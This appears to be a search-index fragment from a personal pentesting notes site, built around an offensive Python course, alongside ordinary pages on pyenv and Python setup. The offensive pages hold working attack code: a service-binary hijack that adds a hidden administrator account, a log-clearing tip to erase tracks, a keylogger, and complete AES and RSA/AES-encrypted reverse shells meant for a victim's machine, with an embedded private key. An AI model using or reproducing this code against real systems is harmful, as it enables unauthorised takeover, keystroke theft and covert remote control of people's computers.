              6. We can replace that file with a malicious service file that will be triggered when opening the Photodex application and get us escalated to admin privileges.

              7. Script for windows 7 app. Go to step 8 for windows 10. Jump to step 9 after this step.

              # Windows 7\nimport servicemanager\nimport win32serviceutil\nimport win32service\nimport win32api\n\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPEED)\n\n    def start(self):\n        self.runflag=True\n\n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

              We can use py2exe to craft an exe file for that python script:

              This setup file will convert the python script scsiaccess.py into an exe file:

              from distutils.core import setup\nimport py2exe, sys, os\n\nsys.arg.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfule = None\n)\n

              You can also use pyinstaller:

              Pyinstaller --onfile Create_New_Admin_account.py\n

              8. Script for Windows 10:

              # The order of importing libraries matter. \"servicemanager\" should be imported after win32X. As following:-\n\nimport win32serviceutil\nimport win32service\nimport win32api\nimport win32timezone\nimport win32net\nimport win32netcon\nimport servicemanager\n\n## the rest of the code is still the same\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPEED)\n\n    def start(self):\n        self.runflag=True\n\n        USER = \"Hacked\"\n        GROUP = \"Administrators\"\n        user_info = dict (\n            name = USER,\n            password = \"python\",\n            priv = win32netcon.USER_PRIV_USER,\n            home_dir = None,\n            comment = None,\n            flags = win32netcon.UF_SCRIPT,\n            script_path = None\n             )\n        user_group_info = dict (\n            domainandname = USER\n            )\n        try:\n            win32net.NetUserAdd (None, 1, user_info)\n            win32net.NetLocalGroupAddMembers (None, GROUP, 3, [user_group_info])\n        except Exception, x:\n            pass\n        ''' \n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n        '''\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

              To export into EXE use:

              Pyinstaller --onfile Create_New_Admin_account.py`\n

              9. Replace the service file, under

              C:\\Program Files (x86)\\Photodex\\ProShow Producer`\n

              10. Rename the original scsiaccess to scsiaccess123.

              11. Put your Python exe as scsiaccess\u00a0 (without .exe).

              12. Restart and test- You should see \"Hacked\" account been created.

              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#python-script-to-check-if-we-are-admin-users-on-windows","title":"Python script to check if we are admin users on Windows","text":"
              import ctypes\n    if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n        print '[-] We are NOT admin! '\n    else:\n        print '[+] We are admin :) '\n
              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#erasing-tracks","title":"Erasing tracks","text":"

              Once you are admin, open Event Viewer and go to Windows Logs. Click right button on Applications and Security and the option \"Clear Logs\".

              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/pyenv/","title":"Pyenv","text":"

              Popular Python version management tool. Pyenv allows you to easily install and switch between multiple Python versions on the same machine.

              Source: https://github.com/pyenv/pyenv

              "},{"location":"python/pyenv/#installation-in-kali","title":"Installation in Kali","text":"

              Check out Pyenv where you want it installed. A good place to choose is $HOME/.pyenv (but you can install it somewhere else):

              git clone https://github.com/pyenv/pyenv.git ~/.pyenv\n

              Optionally, try to compile a dynamic Bash extension to speed up Pyenv. Don't worry if it fails; Pyenv will still work normally:

              cd ~/.pyenv && src/configure && make -C src\n

              Define environment variable PYENV_ROOT to point to the path where Pyenv will store its data. $HOME/.pyenv is the default. If you installed Pyenv via Git checkout, we recommend to set it to the same location as where you cloned it.

              echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.zshrc\n

              Add the\u00a0pyenv\u00a0executable to your\u00a0PATH\u00a0if it's not already there

              echo 'command -v pyenv >/dev/null || export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.zshrc \n

              run\u00a0eval \"$(pyenv init -)\"\u00a0to install\u00a0pyenv\u00a0into your shell as a shell function, enable shims and autocompletion

              echo 'eval \"$(pyenv init -)\"' >> ~/.zshrc \n

              Then, if you have ~/.profile, ~/.bash_profile or ~/.bash_login, add the commands there as well. If you have none of these, add them to ~/.profile. No need in this case, where we have ~/.zshrc.

              If you wish to get Pyenv in noninteractive login shells as well, also add the commands to ~/.zprofile or ~/.zlogin.

              "},{"location":"python/pyenv/#basic-usage","title":"Basic usage","text":"

              Install the desired Python versions using pyenv:

              pyenv install 3.9.0\n

              See installed versions:

              pyenv versions\n

              Set global python version:

               pyenv global 2.7.18\n
              "},{"location":"python/python-installation/","title":"Installing python","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-38-on-ubuntu-20045","title":"Installing python 3.8 on Ubuntu 20.04.5","text":"

              First, update and upgrade:

              sudo apt update && sudo apt upgrade\n

              Add PPA for Python old versions. The old versions of Python such as 3.9, 3.8, 3.7, and older are not available to install using the default system repository of Ubuntu 22.04 LTS Jammy JellyFish or 20.04 Focal Fossa. Hence, we need to add a PPA offered by the \u201cdeadsnakes\u201d team to get the old archived Python versions easily.

              sudo apt install software-properties-common\n
              sudo add-apt-repository ppa:deadsnakes/ppa\n\n# If you get this error:\nAttributeError: NoneType object has no attribute people\n# Try Installing  python3-launchpadlib \nsudo apt-get install  python3-launchpadlib \n

              Check python versions you want. Syntax:

              sudo apt-cache policy python<version>\n

              In my case:

              sudo apt-cache policy python3.9\n

              Install the version you want:

              sudo apt install python3.9\n

              Set up a default version in your system:

              # Checkout existing versions\nls /usr/bin/python*\n\n# Also, let's check out  whether any version is configured as python alternatives or not. For that run:\nsudo update-alternatives --list python\n\n# If the output is: \u201cupdate-alternatives: error: no alternatives for python\u201d. Then it means there are no alternatives that have been configured, hence let\u2019s do some:\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.9 1\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.10 2\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.8 3\n\n# Switch the default Python version\u00a0\nsudo update-alternatives --config python\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#other-methods","title":"Other methods","text":"

              No very orthodox but:

              # Check current Python pointer\nls -l /usr/bin/python\n\n# Check available Python versions**\nls -l /usr/bin/python*\n\n# Unlink current python version**\ncd /usr/bin\nsudo unlink python\n\n# Select required python version and lin to python command**\nsudo ln -s /usr/bin/python2.7 python\n\n# Confirm change in pointer**\nls -l /usr/bin/python\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-in-kali","title":"Installing python in Kali","text":"

              If you are on Ubuntu 19.10 (or any other version unsupported by the deadsnakes PPA, like it's the case of Kali), you will not be able to install using the deadsnakes PPA.

              First, install development packages required to build Python.

              sudo apt update\nsudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev curl\n

              Then download the tarball and extract it:

              wget https://www.python.org/ftp/python/3.9.19/Python-3.9.19.tar.xz\ntar -xf Python-3.9.19.tar.xz\n

              Once the Python tarball has been extracted, navigate to the configure script and execute it in your Linux terminal with:

              cd Python-3.9.19\n./configure\n

              The configuration may take some time. Wait until it is successfully finishes before proceeding.

              If you want to create an alternative install for python, start the build process:

              sudo make altinstall\n

              If you want to replace your current version of Python with this new version, you should uninstall your current Python package using your package manager (such as apt or dnf) and then install:

              sudo make install\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-pip","title":"Installing pip","text":"
              python3 -m pip install pip\n

              If you get error: externally-managed-environment, then the solution is create an environment. As the message explains, this is actually not an issue with Python itself, but rather your Linux distribution (Kali, Debian, etc.) implementing a deliberate policy to ensure you don't break your operating system and system packages by using pip (or Poetry, Hatch, PDM or another non-OS package manager) outside the protection of a virtual environment.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#creating-a-virtual-environment","title":"Creating a virtual environment","text":"

              See virtual Environments.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#switch-python-versions","title":"Switch python versions","text":"

              See pyenv.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-keylogger/","title":"Simple keylogger in python","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n#Ref: https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard\n\nfrom pynput.keyboard import Key, Listener\n\ndef on_press(key):\n    fp=open(\"keylogs.txt\",\"a\") #create a text file and append the key in it\n    print(key)\n    fp.write(str(key)+\"\\n\")\n    fp.close()\n\nwith Listener(on_press=on_press) as listener: # if key is pressed, call on_press function\n    listener.join()\n
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/python-tools-for-pentesting/","title":"Python tools for pentesting","text":"

              Tools and techniques to achieve:

              • Coding your own reverse shell (TCP+HTTP).
              • Exfiltrating data from victim's machine.
              • Using anonymous shell by abusing Twitter, Google Form and Sourceforge.
              • Hacking passwords with different techniques: code a Keylogger, perform Clipboard Hijacking.
              • Bypassing some firewall by including cryptography encryption in your script shells (AES,RSA,XOR)
              • Writing scripts to perform privilege escalation on windows by abusing a weak service. And more.
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#contents","title":"Contents","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#tools","title":"Tools","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#pyinstaller","title":"pyinstaller","text":"

              PyInstaller bundles a Python application and all its dependencies into a single package. The user can run the packaged app without installing a Python interpreter or any modules.

              See pyinstaller.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#py2exe","title":"py2exe","text":"

              This setup file will convert the python script scsiaccess.py into an exe file:

              from distutils.core import setup\nimport py2exe, sys, os\n\nsys.arg.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfule = None\n)\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#inmunity-debuger","title":"Inmunity Debuger","text":"

              See Inmunity Debugger.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-virtual-environments/","title":"Virtual environments","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#virtualenvwrapper","title":"virtualenvwrapper","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#installation","title":"Installation","text":"
              # Make sure you have pip installed.\nsudo apt-get install python3-pip\n\n# Installing virtualenvwrapper\u00a0\nsudo pip3 install virtualenvwrapper\n\n# Open bashrc by \u2013\nsudo gedit ~/.bashrc\n\n# After opening it, add the following \u00a0lines to it :\n\nexport WORKON_HOME=$HOME/.virtualenvs\nexport PROJECT_HOME=$HOME/Devel\nsource /usr/local/bin/virtualenvwrapper.sh\n
              ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#basic-usage","title":"Basic usage","text":"
              # Creating a virtual environment with mkvirtualenv\nmkvirtualenv nameOfEnvironment\n\n# List exisiting environment in your \nlsvirtualenv -b\n\n# Work on an environment\nworkon nameOfEnvironment\n\n# Close current environment\ndeactivate\n\n# Delete virtual environment\nrmvirtualenv nameOfEnvironment\n\n# To work on another version of python:\nmkvirtualenv -p python3.x venv_name\n# You will see something like this: (venv_name)\n

              Backing up virtual environment before removing it:

              pip freeze > requirements.txt\n
              ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#venv","title":"venv","text":"
              python3 -m venv <DIR>\nsource <DIR>/bin/activate\n

              Now you can activate or deactivate the virtual environment with:

              <DIR>\\Scripts\\activate\n
              ","tags":["database","relational","database","SQL"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/","title":"TCP reverse shell with AES encryption","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

              from Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport socket\nimport subprocess\nkey = b\"H\" * 32\nIV = b\"H\" * 16\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = decrypt(s.recv(1024))\n        if 'terminate' in command.decode():\n             break\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n            s.send(encrypt(CMD.stdout.read()))\n\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#server-side","title":"Server side","text":"
              import socket\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16 # this must match the block size, which is 16 byte\nkey = b\"H\" * 32 # 32 goes for AES 256\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16) # pad function is to add the necessary extra data to make sure that the size of the padded_message is 16 bytes or a multiple of 16. This is explained because cipher block chaining encryption uses blocks of 16bytes.\n    encrypted_message = encryptor.encrypt(padded_message) \n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    conn, address = s.accept()\n    print('[+] We got a connection')\n    while True:\n\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send(encrypt(b'terminate'))\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            print(decrypt(conn.recv(1024)).decode())\ndef main():\n    connect()\n\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#test","title":"Test","text":"
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nkey = b\"H\" * 32 #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long.\nIV = b\"H\" * 16\n\ncipher = AES.new(key, AES.MODE_CBC, IV)\n\nmessage = \"Hello\"\npaddedmessage = Padding.pad(message.encode(), 16)\nencrypted = cipher.encrypt(paddedmessage)\n\nprint (encrypted)\n\n\ndecipher = AES.new(key, AES.MODE_CBC, IV)\npaddeddecrypted = decipher.decrypt(encrypted)\nunpaddedencrypted = Padding.unpad(paddeddecrypted, 16)\n\nprint(unpaddedencrypted.decode())\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/","title":"TCP reverse shell with hybrid encryption AES + RSA","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

              import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16\n\ndef GET_AES(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\n\ndef encrypt(message):\n    encryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    global AES_KEY\n    AES_KEY = s.recv(1024)\n    AES_KEY = GET_AES(AES_KEY)\n    AES_KEY = AES_KEY.encode()\n    print(AES_KEY)\n\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command).decode()\n        print (command)\n        if 'terminate' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            s.send(encrypt(result))\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#server-side","title":"Server side","text":"
